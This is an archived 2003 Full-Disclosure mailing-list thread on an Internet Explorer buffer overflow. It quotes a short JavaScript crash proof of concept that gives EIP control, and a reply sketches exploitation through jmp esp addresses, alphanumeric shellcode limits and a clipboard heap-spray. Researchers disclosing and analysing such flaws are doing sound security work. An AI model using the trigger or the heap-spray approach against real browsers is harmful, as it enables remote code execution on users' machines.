Re: [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

From: 3APA3A (3APA3Aat_private)
Date: Mon Jun 30 2003 - 10:17:06 PDT

Next message: Kayne Ian (Softlab): "RE: Starting on Assembly under win32"

Previous message: MO Data: "Re: Starting on Assembly under win32"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Dear SecurITeam BugTraq Monitoring,

It   could   be  perfectly  easy  to  exploit  this  vulnerability  with
alphanumeric  shellcode...  There is a lot of appropriate addresses, for
example with jmp esp in different libraries (NT4 + IE6):

0x636e6294 0x70286161 0x70286221, etc

But  _real_  problem  is  it also does toupper() for all characters. So,
0x63  0x70  etc cannot be used. It's still possible to create shellcode,
but  I see no way to get control, because we have no appropriate address
to overwrite EBP/ESP... So, it's impossible to exploit it in usual way.

It's possible to put huge (few megabytes of) shellcode on the heap (just
to put it in the clipboard too) and try to get something like

jmp 0x20XXXXXX or jmp 0x21XXXXXX

in 0x20200000 - 0x60FFFFFF and 0x7B200000 - 0x7FFFFFFF

because  heap  usually  allocated  somewhere in the end of 0x20XXXXXX it
looks  possible...  That  is  we  can put 8MB of jmp 0x21777777 + 8MB of
NOOPs  +  shellcode into clipboard and overwrite EIP with something like
0x21212121....  But  this  exploit  will work an hour with 100% CPU load
because clipboard operations are slow :)

Any suggestions?

--Wednesday, June 25, 2003, 3:05:20 PM, you wrote to dotslashat_private:

SBM> Hi,

SBM> I can confirm it under Windows 2000 with IE 5.50.4807.2300

SBM> Full control over the EIP, but the shellcode cannot contain (as it currently
SBM> appears) non Alpha Numeric characters, too bad I guess.

SBM> Thanks
SBM> Noam Rathaus
SBM> CTO
SBM> Beyond Security Ltd
SBM> http://www.SecurITeam.com
SBM> http://www.BeyondSecurity.com
SBM> ----- Original Message -----
SBM> From: "KF" <dotslashat_private>
SBM> To: "Digital Scream" <digitalscreamat_private>
SBM> Sent: Monday, June 23, 2003 6:43 PM
SBM> Subject: Re: Internet Explorer >=5.0 : Buffer overflow

>> I can confirm this on Windows XP Professional
>>
>> version 6.0.2800.1106.xpsp2-030422-1633
>>
>> 0x43534c41 refrenced mem at 0x43534c41
>> -KF
>>
>>
>> Digital Scream wrote:
>>
>> >&lt;script&gt;
>> > wnd=open("about:blank","","");
>> > wnd.moveTo(screen.Width,screen.Height);
>> > WndDoc=wnd.document;
>> > WndDoc.open();
>> > WndDoc.clear();
>> > buffer="";
>> > for(i=1;i<=127;i++)buffer+="X";
>> > buffer+="DigitalScream";
>> > WndDoc.write("<HR align='"+buffer+"'>");
>> > WndDoc.execCommand("SelectAll");
>> > WndDoc.execCommand("Copy");
>> > wnd.close();
>> >&lt;/script&gt;
>> >
>> >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
>> >
>> >
>> >
>>
>>
>>

SBM> _______________________________________________
SBM> Full-Disclosure - We believe in it.
SBM> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
~/ZARAZA
Вечная память святому Патрику! (Твен)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Kayne Ian (Softlab): "RE: Starting on Assembly under win32"
Previous message: MO Data: "Re: Starting on Assembly under win32"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jun 30 2003 - 10:59:19 PDT